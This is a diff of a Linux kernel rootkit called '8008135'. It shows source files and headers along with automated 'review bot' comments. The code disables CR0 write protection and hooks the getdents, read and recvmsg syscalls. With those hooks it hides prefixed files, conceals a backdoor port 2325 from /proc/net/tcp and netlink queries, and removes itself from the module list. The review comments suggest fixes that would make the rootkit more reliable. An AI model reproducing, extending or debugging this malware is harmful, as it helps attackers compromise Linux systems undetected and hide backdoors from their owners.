*******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count){
int boff;
struct linux_dirent* ent;
long ret = sys_getdents_orig(fd, dirent, count);
char* dbuf;
if (ret <= 0) {
return ret;
}
dbuf = (char*)dirent;
for (boff = 0; boff < ret;) {
ent = (struct linux_dirent*)(dbuf + boff);
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {
memcpy(dbuf + boff,
dbuf + boff + ent->d_reclen,
ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
} else {
boff += ent->d_reclen;
}
}
return ret;
}
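Review bot: `sys_getdents_new` casts the `__user` pointer `dirent` to `char*` and then runs `strncmp`, `strstr` and `memcpy` on it directly, so kernel code dereferences unvalidated user memory; the buffer should be handled through `copy_from_user` / `copy_to_user` on a kernel copy. The `memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ...)` call has overlapping source and destination and needs `memmove`. The function header still lists PARAMETERS and RETURNS as `-` although the function takes three arguments and returns a byte count.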

@ -17,116 +17,61 @@
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "8008135.h"
/**** var ********************************************************************
*******************************************************************************/
sys_getdents_t sys_getdents_orig = NULL;
/*** FUNCTION ****************************************************************
* NAME: sys_getdents_new
* DESCRIPTION: function overriding the original getdents
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count) {
int boff;
struct linux_dirent* ent;
long ret = sys_getdents_orig(fd, dirent, count);
char* dbuf;
if (ret <= 0) {
return ret;
}
dbuf = (char*)dirent;
// go through the entries, looking for one that has our prefix
for (boff = 0; boff < ret;) {
ent = (struct linux_dirent*)(dbuf + boff);
// if it has hide prefix or module name anywhere, hide it
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {
#if defined DEBUG
printk("\n hide prefix or mod name contained!\n");
printk("\n ret %ld\n ", ret);
printk("\n dbuf %d\n" , dbuf);
printk("\n");
printk(ent->d_name);
#endif
// remove this entry by copying everything after it forward
// and adjust the length reported
#if defined DEBUG
printk("\n reclen %u \n", ent->d_reclen);
#endif
memcpy(dbuf + boff,
dbuf + boff + ent->d_reclen,
ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
#if defined DEBUG
printk("\n ret after change %ld\n ", ret);
#endif
} else {
// on to the next entry
boff += ent->d_reclen;
}
}
return ret;
}
/*** FUNCTION ****************************************************************
* NAME: 8008135_init
* DESCRIPTION: initializing Kernel Module
* DESCRIPTION: initializing Kernel Module - hijacking syscalltable
* PARAMETERS: -
* RETURNS: int
*******************************************************************************/
static int __init init_8008135(void) {
printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
// record the original getdents handler
sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);
// turn write protect off
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// add our new handlers
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents];
sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read];
sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg];
// turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
wprotectionoff();
printk(KERN_INFO "New syscall in place\n");
sys_call_table[__NR_getdents] = sys_getdents_new;
sys_call_table[__NR_read] = sys_read_fake;
sys_call_table[__NR_recvmsg] = my_recvmsg_syscall;
wprotectionon();
network_server_init();
hide_module();
return 0;
}
/*** FUNCTION ****************************************************************
* NAME: 8008135_exit
* DESCRIPTION: unloading Kernel Module
* DESCRIPTION: unloading Kernel Module, restoring the original system call table
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
static void __exit exit_8008135(void) {
// allow us to write to read onlu pages
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// set getdents handler back
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
// turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
printk(KERN_INFO "Old syscall back\n");
network_server_exit();
wprotectionoff();
sys_call_table[__NR_getdents] = sys_getdents_orig;
sys_call_table[__NR_read] = sys_read_orig;
sys_call_table[__NR_recvmsg] = sys_recvmsg_orig;
wprotectionon();
}
// Setting pointers to init-/exit-functions
/*******************************************************************************/
module_init(init_8008135);
module_exit(exit_8008135);
/*******************************************************************************/
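
Review bot: init_8008135 discards the result of network_server_init() and returns 0 unconditionally, although 50ck3t.h declares that function as returning int. Check the result and, on failure, write the saved sys_getdents_orig, sys_read_orig and sys_recvmsg_orig pointers back before returning the error, so a failed load does not leave the table patched. The `(void *)` cast on the recvmsg save is also inconsistent with the two typed casts directly above it.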


@ -1,19 +1,32 @@
#!/usr/bin/env bash
SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )"
SRCS_H="$SCRIPTPATH""/headers"
SGENH="$SRCS_H""/sysgen.h"
SGENS="$SCRIPTPATH""/5y563n.c"
SGENH="$SRCS_H""/5y563n.h"
smap="/boot/System.map-$(uname -r)"
echo -e '#include "5y563n.h"' > "$SGENS"
echo -e "#pragma once" > "$SGENH"
echo -e "#include <linux/fs.h>" >> "$SGENH"
symbline=$(cat $smap | grep '\Wsys_call_table$')
set $symbline
[ -z "$symbline" ] && echo "No SysCall Table Value from System.map found" && exit 2;
echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENH"
echo -e "extern void** sys_call_table;" >> "$SGENH"
echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENS"
procline=$(cat $smap | grep '\Wproc_modules_operations$')
set $procline
echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENH"
echo -e "extern struct file_operations* proc_modules_operations;">> "$SGENH"
echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENS"
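
Review bot: procline is never checked for emptiness, so when proc_modules_operations is missing from System.map, `set $procline` expands to a bare `set`, `$1` still holds the sys_call_table address, and that address is written out as the proc_modules_operations pointer. Test each grep result before calling `set`, as is done for symbline, and move the existing symbline test above its `set` as well. Using `set -- $procline` and quoting `"$smap"` would make both lookups fail visibly instead of silently.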

36
src/h1d3m0dul3.c Normal file

@ -0,0 +1,36 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "h1d3m0dul3.h"
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: hide_module
* DESCRIPTION: hides the module from lsmod
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void hide_module(void){
list_del(&THIS_MODULE->list);
}
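
Review bot: the file banner still reads `main.c` and the RETURNS field of the hide_module block is empty. Name the file correctly and fill the field in the same way as the blocks in 8008135.c (`-` or `int`). The same copied banner appears in the other files added by this change.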

185
src/h1d3p0r7.c Normal file

@ -0,0 +1,185 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "h1d3p0r7.h"
/**** var **********************************************************************
*******************************************************************************/
sys_read_ptr sys_read_orig;
original_recvmsg_syscall sys_recvmsg_orig;
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: hide port
* DESCRIPTION: hides the port 2325
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
size_t count)
{
long result, bp, diff_in_bytes;
char *kbuf, *start_line, *end_line, *port_num;
char *pathname, pbuf[256];
struct files_struct *current_files;
struct fdtable *files_table;
struct path file_path;
// run real read
result = (*sys_read_orig)(fd, buf, count);
if (result <= 0){
return result;
}
current_files = current->files;
files_table = files_fdtable(current_files);
file_path = files_table->fd[fd]->f_path;
pathname = d_path(&file_path, pbuf, 256*sizeof(char));
if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) {
if (!access_ok(VERIFY_READ, buf, result)){
return -1;
}
if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){
return -1;
}
if (copy_from_user(kbuf, buf, result)){
return -1;
}
start_line = strchr(kbuf, ':') - 4;
diff_in_bytes = (start_line - kbuf) * sizeof(char);
for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
start_line = kbuf + bp;
port_num = strchr(strchr(start_line, ':') + 1, ':') + 1;
end_line = strchr(start_line, '\n');
diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) {
memmove(start_line, end_line + 1,
result - bp - diff_in_bytes);
result -= diff_in_bytes;
}
}
// copy from kernel to userspace
if (!access_ok(VERIFY_WRITE, buf, result)){
return EINVAL;
}
if (copy_to_user(buf, kbuf, result)){
return EINVAL;
}
kfree(kbuf);
}
// return number of bytes read
return result;
}
/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original
`recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink
socket with the help of some netlink utility macros. If a netlink socket is being used, we
iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the
source and destination ports with our list of hidden ones. In order to hide an entry we copy
the remaining entries over it and adjust the data length which is returned to the user. */
asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags)
{
long ret;
struct nlmsghdr *nlh;
long count;
int found;
char *stream;
int offset;
int i;
struct inet_diag_msg *r;
int port;
/* Call original `recvmsg` syscall */
ret = sys_recvmsg_orig(sockfd, msg, flags);
/* Some error occured. Don't do anything. */
if (ret < 0)
return ret;
/* Extract netlink message header from message */
nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base);
/* Number of bytes remaining in message stream */
count = ret;
/* Set flag specifying whether message contains data to be masked */
found = 1;
/* NLMSG_OK: This macro will return true if a netlink message was received. It
essentially checks whether it's safe to parse the netlink message (if indeed
is a netlink message) using the other NLMSG_* macros. */
while (NLMSG_OK(nlh, count)) {
if (found == 0)
/* NLMSG_NEXT: Many netlink protocols have request messages that result
in multiple response messages. In these cases, multiple responses will
be copied into the `msg` buffer. This macro can be used to walk the
chain of responses. Returns NULL in the event the message is the last
in the chain for the given buffer. */
nlh = NLMSG_NEXT(nlh, count);
r = NLMSG_DATA(nlh);
port = ntohs(r->id.idiag_sport);
if(port == 2325){
/* Message contains data to be masked */
found = 1;
}else{
found = 0;
continue;
}
stream = (char *) nlh;
/* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it
up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */
offset = NLMSG_ALIGN((nlh)->nlmsg_len);
/* Copy remaining entries over the data to be masked */
for (i=0 ; i<count ; i++)
stream[i] = stream[i + offset];
/* Adjust the data length */
ret -= offset;
}
return ret;
}
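
Review bot: in sys_read_fake every failure path after kmalloc (the copy_from_user check, the second access_ok check and the copy_to_user check) returns without kfree(kbuf), and the last two return positive EINVAL, which the caller will read as a byte count. Route these through one exit label that frees kbuf and returns a negative errno such as -EFAULT. In my_recvmsg_syscall, `msg->msg_iov->iov_base` dereferences a `__user` pointer directly and the copy loop then writes through it; that access needs copy_from_user/copy_to_user like the read hook uses, and the literal 2325 should be DEFAULT_PORT from 50ck3t.h.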

54
src/headers/50ck3t.h Normal file

@ -0,0 +1,54 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_50CK3T_H
#define SRC_HEADERS_50CK3T_H
/**** includes *****************************************************************
*******************************************************************************/
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/kthread.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/netdevice.h>
#include <linux/ip.h>
#include <linux/in.h>
#include <linux/unistd.h>
#include <linux/wait.h>
#include <net/sock.h>
#include <net/tcp.h>
#include <net/inet_connection_sock.h>
#include <net/request_sock.h>
/**** defines *****************************************************************
*******************************************************************************/
#define DEFAULT_PORT 2325
#define DEFAULT_PORT_HEX "0915"
#define MAX_CONNS 16
#define MODULE_NAME "8008135"
int network_server_init(void);
void network_server_exit(void);
#endif
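
Review bot: MODULE_NAME is defined here and again in 637d3n75.h, and 8008135.h includes both headers. Keep the definition in one header so the two copies cannot drift apart.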

13
src/headers/610b415.h Normal file

@ -0,0 +1,13 @@
/*
* 610b415.h
*
* Created on: Dec 6, 2019
* Author: vlr
*/
#ifndef SRC_HEADERS_610B415_H_
#define SRC_HEADERS_610B415_H_
extern char * stringRemoveChars(char *AString, char *ASpanset);
#endif /* SRC_HEADERS_610B415_H_ */

68
src/headers/637d3n75.h Normal file

@ -0,0 +1,68 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
#ifndef SRC_HEADERS_637d3n75_H
#define SRC_HEADERS_637d3n75_H
/**** include ****************************************************************
*******************************************************************************/
#include <linux/module.h>
#include <asm/special_insns.h>
#include <linux/string.h>
#include <linux/fs.h>
#include "5y563n.h"
#define HIDE_PREFIX "8008135."
#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
#define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
#define __NR_getdents 78
/**** type ********************************************************************
******************************************************************************/
struct linux_dirent {
unsigned long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[1];
};
typedef asmlinkage long (*sys_getdents_ptr)(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count);
/*** var ********************************************************************
*******************************************************************************/
extern sys_getdents_ptr sys_getdents_orig;
extern asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count);
#endif
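
Review bot: `#define __NR_getdents 78` redefines a name that belongs to the kernel's own unistd headers with a bare magic number, and h1d3p0r7.h does the same for __NR_read and __NR_recvmsg. Drop the local defines and rely on the kernel header (50ck3t.h already pulls in <linux/unistd.h>), or at minimum add a comment stating which architecture the numbers are for. The include guard `SRC_HEADERS_637d3n75_H` also mixes case, unlike `SRC_HEADERS_50CK3T_H`.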


@ -18,49 +18,44 @@
*/
#ifndef SRC_HEADERS_8008135_H
#define SRC_HEADERS_8008135_H
/**** Includes ***************************************************************
*******************************************************************************/
#include "637d3n75.h"
#include "50ck3t.h"
#include "h1d3m0dul3.h"
#include "h1d3p0r7.h"
#include "p463unpr073c7.h"
// To set module data
#include <linux/module.h>
// To communicate kernel
#include <linux/kernel.h>
/*
#include <linux/kallsyms.h>
#include <asm/special_insns.h>
#include <linux/string.h>
#include <linux/fs.h>
#include "sysgen.h"
#include <linux/fdtable.h>
#include <linux/net.h>
#include <linux/seq_file.h>
#include <linux/slab.h>
#include <linux/socket.h>
#include <linux/version.h>
#include <net/tcp.h>
#include <net/udp.h>
*/
/**** Defines *****************************************************************
*******************************************************************************/
#define GETDENTS_SYSCALL_NUM 78
#define WRITE_PROTECT_FLAG (1<<16)
#define HIDE_PREFIX "8008135."
#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
#define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
/**** Modinfo ****************************************************************
*******************************************************************************/
MODULE_LICENSE("GPLv3");
MODULE_LICENSE("GPL");
MODULE_AUTHOR("JanKoernerEnterprises");
MODULE_DESCRIPTION("8008135");
MODULE_VERSION("0.1");
/**** type *******************************************************************
*******************************************************************************/
struct linux_dirent {
unsigned long d_ino;
unsigned long d_off;
unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
};
typedef asmlinkage long (*sys_getdents_t)(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count);
#endif /* SRC_HEADERS_8008135_H */
#endif
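
Review bot: with MODULE_LICENSE("GPL") following MODULE_LICENSE("GPLv3") in the Modinfo block, the module string no longer matches the file banners in this change, which all say version 3 of the License or any later version. Add a one-line comment next to MODULE_LICENSE explaining why the string differs from the banner.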

30
src/headers/h1d3m0dul3.h Normal file

@ -0,0 +1,30 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_h1d3m0dul3_H
#define SRC_HEADERS_h1d3m0dul3_H
#include <linux/module.h>
#include <linux/kernel.h>
extern void hide_module(void);
#endif

62
src/headers/h1d3p0r7.h Normal file

@ -0,0 +1,62 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_h1d3p0r7_H
#define SRC_HEADERS_h1d3p0r7_H
/**** includes ****************************************************************
*******************************************************************************/
#include "50ck3t.h"
/* are those really all needed? */
#include <linux/fs.h>
#include <linux/fdtable.h>
#include <linux/net.h>
#include <linux/seq_file.h>
#include <linux/slab.h>
#include <linux/socket.h>
#include <linux/version.h>
#include <net/tcp.h>
#include <net/udp.h>
#include <linux/inet_diag.h> /* Needed for ntohs */
#define __NR_read 0
#define __NR_recvmsg 47
typedef asmlinkage long (*sys_read_ptr)(unsigned int fd,
char __user *buf,
size_t count);
typedef asmlinkage ssize_t (*original_recvmsg_syscall)(int, struct user_msghdr __user *, unsigned);
/**** var **********************************************************************
*******************************************************************************/
extern sys_read_ptr sys_read_orig;
extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
size_t count);
extern original_recvmsg_syscall sys_recvmsg_orig;
extern asmlinkage ssize_t my_recvmsg_syscall(int, struct user_msghdr __user *, unsigned);
#endif
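
Review bot: the comment `/* Needed for ntohs */` on <linux/inet_diag.h> is misleading, since in h1d3p0r7.c that header is what supplies struct inet_diag_msg. Correct the comment, and resolve the open question in `/* are those really all needed? */` before merging by removing the includes that h1d3p0r7.c does not use.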


@ -0,0 +1,33 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_p463unpr073c7_H
#define SRC_HEADERS_p463unpr073c7_H
#include <linux/module.h>
#include "asm/special_insns.h"
/**** defines *****************************************************************
*******************************************************************************/
#define WRITE_PROTECT_FLAG (1<<16)
extern void wprotectionoff(void);
extern void wprotectionon(void);
#endif
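
Review bot: `#include "asm/special_insns.h"` uses quotes for a kernel header, while 637d3n75.h includes the same file as <asm/special_insns.h>. Use the angle-bracket form here too so the lookup does not start in the project's own header directory.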

48
src/p463unpr073c7.c Normal file

@ -0,0 +1,48 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "p463unpr073c7.h"
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: wprotectionoff
* DESCRIPTION: turn page write protection off
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void wprotectionoff(void){
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
}
/*** FUNCTION ****************************************************************
* NAME: wprotectionon
* DESCRIPTION: turn page write protection on
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void wprotectionon(void){
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
}